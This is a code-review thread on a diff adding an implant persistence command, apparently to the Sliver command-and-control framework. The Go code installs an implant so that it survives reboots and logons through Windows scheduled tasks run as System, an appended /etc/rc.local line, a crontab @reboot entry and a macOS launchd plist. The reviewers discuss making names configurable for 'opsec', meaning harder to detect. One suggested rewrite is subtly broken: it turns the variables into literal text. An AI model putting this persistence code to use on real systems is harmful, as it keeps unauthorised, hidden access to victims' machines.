client/command/persist.go

```diff
@@ -0,0 +1,411 @@
+				Path:    "C:\\Windows\\System32\\schtasks.exe",
+				Args:    []string{"/create", "/tn", sliver, "/tr", path, "/sc", "onstart", "/ru", "System", "/f"},
+				Output:  false,
+				Request: ActiveSession.Request(ctx),
+			})
+			if err != nil {
+				fmt.Printf(Warn+"Error: %v\n", err)
+				return
+			}
+		} else {
+			// User persistence (schtasks)
+			_, err = rpc.Execute(context.Background(), &sliverpb.ExecuteReq{
+				Path:    "C:\\Windows\\System32\\schtasks.exe",
+				Args:    []string{"/create", "/tn", sliver, "/tr", path, "/sc", "onlogon", "/f"},
+				Output:  false,
+				Request: ActiveSession.Request(ctx),
+			})
+			if err != nil {
+				fmt.Printf(Warn+"Err: %v\n", err)
+				return
+			}
+		}
+	case "linux":
+		_, err = rpc.Execute(context.Background(), &sliverpb.ExecuteReq{
+			Path:    "/bin/chmod",
+			Args:    []string{"0100", path},
+			Output:  false,
+			Request: ActiveSession.Request(ctx),
+		})
+		if err != nil {
+			fmt.Printf(Warn+"Error: %v\n", err)
+			return
+		}
+
+		if session.Username == "root" {
+			// Root persistence (rc.local)
+			resp, err := rpc.Download(context.Background(), &sliverpb.DownloadReq{
+				Path:    "/etc/rc.local",
+				Request: ActiveSession.Request(ctx),
+			})
+			if err != nil {
+				fmt.Printf(Warn+"Error: %v\n", err)
+				return
+			}
+
+			rc := strings.Split(string(resp.Data), "\n")
+			leline, rc := rc[len(rc)-1], rc[:len(rc)-1]
+			rc = append(rc, path+" & disown")
+			rc = append(rc, leline)
+
+			_, err = rpc.Upload(context.Background(), &sliverpb.UploadReq{
+				Path:    "/etc/rc.local",
+				Encoder: "gzip",
+				Data:    gzip.Encode([]byte(strings.Join(rc[:], "\n"))),
+				Request: ActiveSession.Request(ctx),
+			})
+			if err != nil {
+				fmt.Printf(Warn+"Error: %v\n", err)
+				return
+			}
+		} else {
+			// User persistence (crontab)
+			_, err = rpc.Execute(context.Background(), &sliverpb.ExecuteReq{
+				Path:    "/bin/sh",
+				Args:    []string{"-c", fmt.Sprintf("\"echo \\\"@reboot %s\\\" | crontab -\"", path)},
+				Output:  false,
+				Request: ActiveSession.Request(ctx),
+			})
+			if err != nil {
+				fmt.Printf(Warn+"Error: %v\n", err)
+				return
+			}
+		}
+	case "darwin":
+		_, err = rpc.Execute(context.Background(), &sliverpb.ExecuteReq{
+			Path:    "/bin/chmod",
+			Args:    []string{"0100", path},
+			Output:  false,
+			Request: ActiveSession.Request(ctx),
+		})
+		if err != nil {
+			fmt.Printf(Warn+"Error: %v\n", err)
+			return
+		}
+
+		plist := "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+		plist += "<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">"
+		plist += "<plist version=\"1.0\">"
+		plist += "<dict><key>Label</key><string>"
+		plist += sliver
+		plist += "</string><key>Program</key><string>"
+		plist += path
+		plist += "</string><key>RunAtLoad</key><true/>"
+		plist += "<key>KeepAlive</key><true/>"
+		plist += "</dict></plist>"
```

Comment:
This can be simplified with:
```go
plist := `<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict><key>Label</key><string>
sliver
</string><key>Program</key><string>
path
</string><key>RunAtLoad</key><true/>
<key>KeepAlive</key><true/>
</dict></plist>`
```

Also, we should make the `label` configurable, for opsec purposes.

Reply:
Both `sliver` and `path` are variables.

Reply:
I meant that `path` should be configurable by the end user.

Reply:
The path is now configureable.
Make sure to include the drive without a trailing `\`.
Ex: `C:\Windows\System32`